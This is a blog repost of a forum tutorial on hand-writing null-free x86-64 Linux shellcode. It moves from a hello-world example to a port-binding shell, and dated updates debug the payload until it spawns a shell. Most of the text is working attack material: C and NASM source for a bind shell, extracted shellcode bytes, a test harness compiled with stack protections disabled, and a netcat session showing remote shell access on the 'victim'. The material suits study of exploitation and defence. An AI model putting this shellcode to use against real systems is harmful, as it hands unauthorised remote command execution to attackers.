Repost of Shellcode Programming

Due to the lack of available information on this topic, I've decided to repost this on my blog. It's something I'd like to be able to look back on when I need it:

Before writing this, I thought about how hard I had worked on this topic (about two weeks of constant hammering) and how it opened doors that had been closed to me because so much has changed over time. I also know what this community stands for, and that without it, and without someone to guide me on this journey, I'd be lost as hell. So I figured I'd give back by sharing what I've learned recently: writing shellcode for a port-bind attack. The difference between the usual way of writing it and mine is that I try to use a more logical and concise method. I'm going to assume that you know x64 ASM, C network programming, and the basics of using Linux. I'm also trusting that this post stays within the Soldierx community. I strongly support this community and hope its members benefit from this information.

If you don't know x64 ASM, I would recommend using Ray Seyfarth's Intro to x64 on Linux (and Windows for future projects):
https://www.amazon.com/s/ref=dp_byline_sr_book_1?ie=UTF8&text=Ray+Seyfar...
If you don't know C network programming I highly recommend Linux Socket Programming By Example by Warren Gay:
https://www.amazon.com/Linux-Socket-Programming-Example-Warren/dp/078972...

A lot of sources on shellcode and assembly are outdated, and that is the biggest obstacle when reading something like The Shellcoder's Handbook: many of the techniques no longer work as written. A lot changed between 32-bit x86 and today's x86-64. On 64-bit Linux, system calls are made with the syscall instruction instead of int 0x80, the syscall numbers are different, and the arguments go in rdi, rsi, rdx, r10, r8 and r9. Why shellcode? Because you can inject shellcode into a running process on the victim's machine. How to do that I'll save for another time. The first thing to start with is a simple Hello World in C:

int main(int argc, char **argv)
{
        write(1, "Hello, World!", 13);
}

If you copy this, compile it with gcc, and run the resulting a.out file, you'll get the famous hello world. (gcc will warn that write() is undeclared, and newer versions may refuse to compile it until you add #include <unistd.h>.) But what you should be asking is: why did I write it like this, with no headers included or anything? The reason is that write() is a thin wrapper around what is known as a system call. printf(), on the other hand, is not something the kernel knows about. It is a C library function that formats the string and then hands the result to write(). Each syscall has its own number, starting at 0, and the numbers are listed in a header file. On Ubuntu, which is what I'm using, that header is called unistd_64.h, because the 32-bit and 64-bit versions of the operating system use different numbers for the same syscalls. To find out where your copy is, use the find command to look for it and cat to print it in the terminal:

find /usr/include -name unistd_64.h
cat <what you get here>

You can also look for syscall values on the internet for example on this page:
http://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/

So let's use what we know to write our hello world in assembly using the write syscall:

section .data
    msg db      "hello, world!"

section .text
    global _start
_start:
    mov     rax, 1
    mov     rdi, 1
    mov     rsi, msg
    mov     rdx, 13
    syscall
    mov    rax, 60
    mov    rdi, 0
    syscall

Use nasm to assemble it and ld to link the resulting object file:
nasm -f elf64 -g hello.asm
ld -o hello hello.o
./hello

This should print out hello, world!. Then you can objdump it to see the resulting machine code, which is our shellcode:
$objdump -d hello

hello:     file format elf64-x86-64


Disassembly of section .text:

00000000004000b0 <_start>:
  4000b0:       b8 01 00 00 00          mov    $0x1,%eax
  4000b5:       bf 01 00 00 00          mov    $0x1,%edi
  4000ba:       48 be d8 00 60 00 00    movabs $0x6000d8,%rsi
  4000c1:       00 00 00
  4000c4:       ba 0d 00 00 00          mov    $0xd,%edx
  4000c9:       0f 05                   syscall
  4000cb:       b8 3c 00 00 00          mov    $0x3c,%eax
  4000d0:       bf 00 00 00 00          mov    $0x0,%edi
  4000d5:       0f 05                   syscall
                ^ shellcode  ^

The problem with this shellcode is that it contains too many of what we call null bytes. The processor itself doesn't mind them, but shellcode usually gets into a target through string-handling code such as strcpy(), which treats a null byte as the end of the string, so everything after the first \x00 is cut off. I should add that shellcode is just the raw hex values of the machine instructions that the processor executes. Take the first mov instruction as an example:

\xb8\x01\x00\x00\x00 ---gets interpreted by processor as--> \xb8 is the opcode for "mov a 32-bit value into eax", and \x01\x00\x00\x00 is that 32-bit value (1) stored in little-endian order.

The extra 00s you see are there because the instruction carries a full 32-bit immediate even though the value fits in one byte (writing to eax also clears the upper half of rax), which leads me to show you this:
https://imgur.com/a/rWUz75J

There are four ways to get rid of null bytes, and I will show you how the first three are done after explaining them:
1-push the value into the stack and pop it into the register
2-move the value into the first 8 bits (or 1 byte) of the register
3-using the jump and call trick
4-for strings, write each character using ascii hex characters into the appropriate registers

And here's our hello world without all the null bytes:

global _start
section .text      
_start:
    jmp short data

shellcode:
    xor     rax,rax
    xor     rdi, rdi
    xor     rsi, rsi
    xor     rdx, rdx
    mov     al, 1       ;2-moving into lowest byte of register
    push    byte 1      ;1-pushing the value into stack
    pop     rdi         ;1-and then popping it
    pop     rsi         ;3-popping the address of msg from stack
    mov     dl, 13      ;2-moving into lowest byte of register
    syscall
   
    mov     al, 60
    mov     dil, 1
    syscall

data:
    call shellcode
    msg     db "Hello, World!"

Now compile it like before and objdump it:
$ objdump -d hello

hello:     file format elf64-x86-64


Disassembly of section .text:

0000000000400080 <_start>:
  400080:       eb 1d                   jmp    40009f <data>

0000000000400082 <shellcode>:
  400082:       48 31 c0                xor    %rax,%rax
  400085:       48 31 ff                xor    %rdi,%rdi
  400088:       48 31 f6                xor    %rsi,%rsi
  40008b:       48 31 d2                xor    %rdx,%rdx
  40008e:       b0 01                   mov    $0x1,%al
  400090:       6a 01                   pushq  $0x1
  400092:       5f                      pop    %rdi
  400093:       5e                      pop    %rsi
  400094:       b2 0d                   mov    $0xd,%dl
  400096:       0f 05                   syscall
  400098:       b0 3c                   mov    $0x3c,%al
  40009a:       40 b7 01                mov    $0x1,%dil
  40009d:       0f 05                   syscall

000000000040009f <data>:
  40009f:       e8 de ff ff ff          callq  400082 <shellcode>

00000000004000a4 <msg>:
  4000a4:       48                      rex.W
  4000a5:       65 6c                   gs insb (%dx),%es:(%rdi)
  4000a7:       6c                      insb   (%dx),%es:(%rdi)
  4000a8:       6f                      outsl  %ds:(%rsi),(%dx)
  4000a9:       2c 20                   sub    $0x20,%al
  4000ab:       57                      push   %rdi
  4000ac:       6f                      outsl  %ds:(%rsi),(%dx)
  4000ad:       72 6c                   jb     40011b <msg+0x77>
  4000af:       64                      fs
  4000b0:       21                      .byte 0x21

And it's free of null bytes!
Now all you have to do is extract and test the shellcode. To do this I've made a simple bash script out of a one-liner written by someone else on the internet, which pulls the bytes out of the objdump output. You can save it and chmod +x it so that it becomes an executable shell script:
#!/bin/bash
PROGRAM=$1
objdump -d ./${PROGRAM}|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

Save this into a file (I named mine extract-shell), chmod +x it, then run it on the hello program to get:
$ ./extract-shell hello
"\xeb\x1d\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\xb0\x01\x6a\x01\x5f\x5e\xb2\x0d\x0f\x05\xb0\x3c\x40\xb7\x01\x0f\x05\xe8\xde\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x20\x57\x6f\x72\x6c\x64\x21"

Then copy and paste this into our C code to test the shellcode itself (I named mine test.c):
char code[]="\xeb\x1d\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\xb0\x01\x6a\x01\x5f\x5e\xb2\x0d\x0f\x05\xb0\x3c\x40\xb7\x01\x0f\x05\xe8\xde\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x20\x57\x6f\x72\x6c\x64\x21";
int main(int argc, char **argv)
{
        int (*func)();
        func = (int (*)()) code;
        (int)(*func)();

}

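Compile this code and run it like so (note: -z execstack is an option that gcc passes through to the linker, so it works without the separate execstack tool; if you want that tool as well, you can install it on Ubuntu using sudo apt install execstack):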
$gcc -fno-stack-protector -z execstack test.c
$./a.out
Hello, World!

So now that you know how to write shellcode, the next step is making it do something useful, like port-binding shellcode. The theory is very simple: your shellcode binds a socket to an IP address and port, listens, and accepts a connection. You then duplicate the client socket onto your stdin, stdout, and stderr file descriptors. That way, when you execute a write syscall on stdout for example, the data goes to the client socket instead of the terminal.

1)victim becomes a server<----you connect to the victim that has this shellcode --- hacker
2)you use a execve syscall to start a shell

Here's the C code I wrote for it. In this case I'm using my private IP of 192.168.1.16 and port 1234 as the target:

#include <sys/socket.h>
#include <netinet/in.h>
#include <stdlib.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <stdio.h>

int main()
{
        // Create the socket (man socket)
        // AF_INET for IPv4
        // SOCK_STREAM for TCP connection
        int host_sock = socket(AF_INET, SOCK_STREAM, 0);

        // Create sockaddr_in struct (man 7 ip)
        struct sockaddr_in host_addr;
        host_addr.sin_family = AF_INET;
        host_addr.sin_port = htons(1234);
        host_addr.sin_addr.s_addr = inet_addr("192.168.1.16");
        // Bind address to socket (man bind)
        bind(host_sock, (struct sockaddr *)&host_addr, sizeof(host_addr));

        // Use the created socket to listen for connections (man listen)
        listen(host_sock, 0);

        // Accept connections, (man 2 accept) use NULLs to not store connection information from peer
        int client_sock = accept(host_sock, NULL, NULL);

        // Redirect stdin, stdout, stderr to client
        dup2(client_sock, 0);
        dup2(client_sock, 1);
        dup2(client_sock, 2);

        // Execute /bin/sh (man execve)
        execve("/bin/sh", NULL, NULL);
}

When you compile and run this, it sits waiting until the hacker connects to it. In this case I'm going to use netcat, a program that comes with most Linux systems, to connect to the victim:
$nc 192.168.1.16 1234
echo hello!
hello!
id
uid=1000(ghost) gid=1000(ghost) groups=1000(ghost),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare),128(kvm),129(ubridge),132(libvirt)

Now, writing the shellcode for this is harder than writing the plain assembly for it. What distinguishes this post from anything else available in the 4% of the internet that we can see is that I used a C-style struct in the assembly (no C involved, I promise), and executed the syscalls in the same order and form as in the C code, with no fancy assembly instructions or tricks for filling in the blanks:

segment .data

;struct sockaddr_in host_addr;
;host_addr.sin_family = AF_INET;
;host_addr.sin_port = htons(1234);
;host_addr.sin_addr.s_addr = inet_addr("192.168.1.16");

struc sockaddr_in
        sin_family  resw 1              ;allocate 2 bytes
        sin_port        resw 1          ;allocate 2 bytes
        sin_addr        resd 1          ;allocate 4 bytes (for 32 bit address)
        sin_zero        resb 8          ;allocate 8 bytes (for the 0 padding)
endstruc

host_addr istruc sockaddr_in
        at sin_family, dw 0x02
        at sin_port, dw 0xd204          ;port 1234 is 0x04d2 in hex, stored in network byte order (bytes 04 d2)
        at sin_addr, dd 0x1001A8C0  ;address 192.168.1.16
        at sin_zero, db 0
iend

msg db "got here"
bin db "/bin/sh", 0      ;null-terminated, execve expects a C string

segment .text
        global _start
_start:
        ;sock= socket(AF_INET, SOCK_STREAM, 0)
        mov     rax,41
        mov             rdi,2                 ;AF_INET, values come from socket.h (find /usr/include -name socket.h)
        mov             rsi,1                 ;SOCK_STREAM
        mov             rdx,0                 ;protocol 0
        syscall
        mov             rbx,rax                 ;save the fd!

        ;bind(host_sock, (struct sockaddr *)&host_addr, sizeof(host_addr));
        xor             rax,rax
        xor             rdi,rdi
        xor             rsi,rsi
        xor             rdx,rdx
        mov             rax,49                  ;load the syscall value for bind
        mov             rdi,rbx                 ;load the file descriptor we saved earlier
        mov             rsi,host_addr   ;load the address of the struct
        mov             rdx,16                  ;the size is 16 bytes
        syscall
        cmp             rax, 0
        jl              exit

        ;listen(host_sock, 0);
        xor             rax,rax
        xor             rdi,rdi
        xor             rsi,rsi
        xor             rdx,rdx
        mov             rax,50                  ;load the syscall value for listen
        mov             rdi,rbx                 ;load the file descriptor
        syscall

        ;int client_sock = accept(host_sock, NULL, NULL);
        xor             rax,rax
        xor             rdi,rdi
        xor             rsi,rsi
        xor             rdx,rdx
        mov             rax,43                  ;load the syscall value for accept
        mov             rdi,rbx                 ;load the file descriptor
        syscall
        mov             rcx,rax                 ;save the client file descriptor (syscall overwrites rcx, so read it before the next syscall)

        ;duplicate the file descriptors into stdin, stdout,stderr
        xor             rax,rax
        xor             rdi,rdi
        xor             rsi,rsi
        mov             rax, 33
        mov             rdi, rcx
        mov             rsi, 0
        syscall

        xor     rax,rax
        mov             rax, 33
        mov             rsi, 1
        syscall

        xor     rax,rax
        mov             rax, 33
        mov             rsi, 2
        syscall

        ;and finally execute /bin/sh
        xor             rax,rax
        xor             rdi,rdi
        xor             rsi,rsi
        xor             rdx,rdx
        mov             rax,59
        mov             rdi,bin
        syscall

        ;print got here (only reached if execve fails, for debugging purposes)
        xor             rax, rax
        mov     rax,1
        xor             rdi, rdi
        mov             rdi,1
        xor             rsi,rsi
        mov             rsi, msg
        mov             rdx, 8
        syscall

exit:
        ;exit
        xor             rax,rax
        mov             rax,60
        xor             rdi,rdi
        syscall

If you need help understanding how I wrote my structure, you can check out this other post I made on the programming forums here:
https://www.soldierx.com/bbs/201809/Using-structures-NASM-x64-Assembly

The way this works is that you have to know that the sockaddr_in struct is 16 bytes in length. Lay it out with the wrong size or pass the wrong length and bind() will either misread your address or fail outright. After that, the rest is just filling in the blanks for the individual syscalls. As you write this, you can use the strace program to see how each syscall is being filled out, keeping in mind that 1) each syscall has a return value, and 2) that return value comes back in rax:

$ strace -e socket,bind,listen,accept,dup2 ./portbindasm
socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 3
bind(3, {sa_family=AF_INET, sin_port=htons(1234), sin_addr=inet_addr("192.168.1.16")}, 16) = 0
listen(3, 0)                            = 0
accept(3, NULL, NULL)                   = 4
dup2(4, 0)                              = 0
dup2(4, 1)                              = 1
dup2(4, 2)                              = 2
----should pause here if everything goes smoothly---
+++ exited with 0 +++

And with that I'm going to stop here and let you, the reader, figure out how to write the shellcode for this. Until next time, thanks for reading!

-------------------------------------[UPDATE:9/28/18]-----------------------------------------------------------------------------------------

I have to admit that before testing this I had a working theory that my assembly code would still work once the null bytes were removed, and after writing my null-free version, it did. Then a new problem arose: when I inserted the null-byte-free shellcode into the C code to test it, strace showed a lot of garbage values, and the address structure and everything else was filled in incorrectly. For instance, the socket and bind syscalls would turn out as:

socket(AF_INET, SOCK_DGRAM|SIGEV, 0xffffffffffffffffff63) = -1 [ERROR BAD ADDRESS]
bind(243, {sa_family=AF_INET, sin_port=htons(56865), sin_addr=inet_addr(0xfffffffffffffff2131123213)}, 16) = -1

As a result I went ahead and did things the traditional way: instead of defining the sockaddr_in structure the way I did previously, I pushed the values onto the stack and copied the stack pointer into the register that holds the pointer argument, as shown below:

segment .text
        global _start
_start:
        ;sock= socket(AF_INET, SOCK_STREAM, 0)
        push    41
        pop             rax
        push    2
        pop     rdi
        push    1
        pop             rsi
        xor             rdx,rdx
        syscall
        mov             rbx,rax                         ;save the fd!

        ;bind(host_sock, (struct sockaddr *)&host_addr, sizeof(host_addr));
        mov             al,49                   ;load the syscall value for bind
        mov             dil,bl                  ;load the file descriptor we saved earlier

        ;build the sockaddr struct
        push    dword 0x1001A8C0;push my ip address into stack
        push    word  0xd204    ;push my port into stack
        push    word  2                 ;push the value for AF_INET
        mov             rcx,rsp                 ;move the stack pointer into rcx
        mov             rsi,rcx                 ;move rcx into the second argument of bind()
        mov             dl,16                   ;the size is 16 bytes
        syscall

        ;listen(host_sock, 0);
        xor             rax,rax                 ;zero out the argument registers
        xor             rdi,rdi
        xor             rsi,rsi
        xor             rdx,rdx
        mov             al,50                   ;load the syscall value for listen
        mov             dil,bl                  ;load the file descriptor
        syscall

        ;int client_sock = accept(host_sock, NULL, NULL);
        xor             rax,rax                 ;zero out the argument registers
        xor             rdi,rdi
        xor             rsi,rsi
        xor             rdx,rdx
        mov             al,43                   ;load the syscall value for accept
        mov             dil,bl                  ;load the file descriptor
        syscall
        mov             cl,al                   ;save the client file descriptor

        ;duplicate the file descriptors into stdin, stdout,stderr
        xor             rax,rax                 ;zero out the argument registers
        xor             rdi,rdi
        xor             rsi,rsi
        mov             al, 33
        mov             dil, cl
        syscall

        xor     rax,rax
        mov             al, 33
        mov             sil, 1
        syscall

        xor     rax,rax
        mov             al, 33
        mov             sil, 2
        syscall

        ;finally execute execve (where the problem is)
        xor     rax,rax
        push    rax
        xor     rdx,rdx
        xor     rsi,rsi
        mov     rbx,0x68732f2f6e69622f
        push    rbx
        push    rsp
        pop     rdi
        mov     al,0x3b
        syscall

        ;exit
        xor             rax,rax
        mov             al,60
        xor             rdi,rdi
        syscall

After putting the shellcode generated from this into the C test code, the problem shows up in the execve call, where what should be "/bin/sh" turns into "/bin/shS", meaning one byte is getting in the way of this finally executing:

$ strace -e socket,bind,accept,dup2,execve ./a.out
execve("./a.out", ["./a.out"], 0x7fffa9515d50 /* 58 vars */) = 0
socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 3
bind(3, {sa_family=AF_INET, sin_port=htons(1234), sin_addr=inet_addr("192.168.1.16")}, 16) = 0
accept(3, NULL, NULL)                   = 4
dup2(4, 0)                              = 0
dup2(4, 1)                              = 1
dup2(4, 2)                              = 2
execve("/bin/shS", NULL, NULL)          = -1 ENOENT (No such file or directory) <------------problem
                        ^

I have tried a lot of the fixes floating around the internet. At this point I'm thinking that it could be Ubuntu. If you guys find anything that makes it work feel free to reply, but until I can figure out how to fix this, all I can do is apologize and keep looking for a solution.

-------------------------------------[UPDATE:9/29/18]-----------------------------------------------------------------------------------------
At last, I have found the persistent problem with my code: execve was getting the wrong bytes from the shellcode. I was puzzled that when I tried other people's solutions to the execve problem, by rewriting the exact same x64 code and extracting it the way I showed in this tutorial, execve still ended up with a version of "/bin/sh" that didn't work. So I figured, what if I copy and paste the finished shellcode from the Exploit-DB website instead? It worked, and the author had posted the objdump of his execve file along with it. Then it hit me: what if my shellcode wasn't being extracted correctly this whole time? That was exactly the case. Here, I'll show you:

$ objdump --disassemble execve

execve:     file format elf64-x86-64


Disassembly of section .text:

0000000000400080 <_start>:
  400080:       48 31 c0                xor    %rax,%rax
  400083:       50                      push   %rax
  400084:       48 31 d2                xor    %rdx,%rdx
  400087:       48 31 f6                xor    %rsi,%rsi
  40008a:       48 bb 2f 62 69 6e 2f    movabs $0x68732f2f6e69622f,%rbx
  400091:       2f 73 68
  400094:       53                      push   %rbx
  400095:       54                      push   %rsp
  400096:       5f                      pop    %rdi
  400097:       b0 3b                   mov    $0x3b,%al
  400099:       0f 05                   syscall

$ ./extract-shell execve
"\x48\x31\xc0\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"
If you compare the two, the objdump has two \x2f bytes between \x6e and \x73, but the extracted string has only one.

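The idea of the execve shellcode is to run either "//bin/sh" or "/bin//sh", because the extra slash pads the string to exactly 8 bytes, so it fills a whole 64-bit register and gets pushed onto the stack without any null bytes. On x86-64 a push is always 8 bytes wide, whether the processor is AMD (I use an AMD FX 4300) or Intel. The kernel treats the doubled slash as a single one, so execve handles our little "typo" just fine. The extraction script is what dropped the byte: it keeps at most six bytes per objdump line (the cut -f1-6), but objdump prints seven bytes on the movabs line. With one \x2f missing, the next byte in the stream, \x53 (the push %rbx, which is the letter S in ASCII), got pulled into the string, and that is where "/bin/shS" came from. So to fix this problem you can simply add the missing \x2f back, and testing the resulting shellcode then gives: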

$ strace -e socket,dup2,accept,bind,execve ./a.out

execve("./a.out", ["./a.out"], 0x7fffffffdfd0 /* 58 vars */) = 0
socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 3
bind(3, {sa_family=AF_INET, sin_port=htons(1234), sin_addr=inet_addr("192.168.1.16")}, 16) = 0
accept(3, NULL, NULL)                   = 4
dup2(4, 0)                              = 0
dup2(4, 1)                              = 1
dup2(4, 2)                              = 2
execve("//bin/sh", NULL, NULL)          = 0

Success!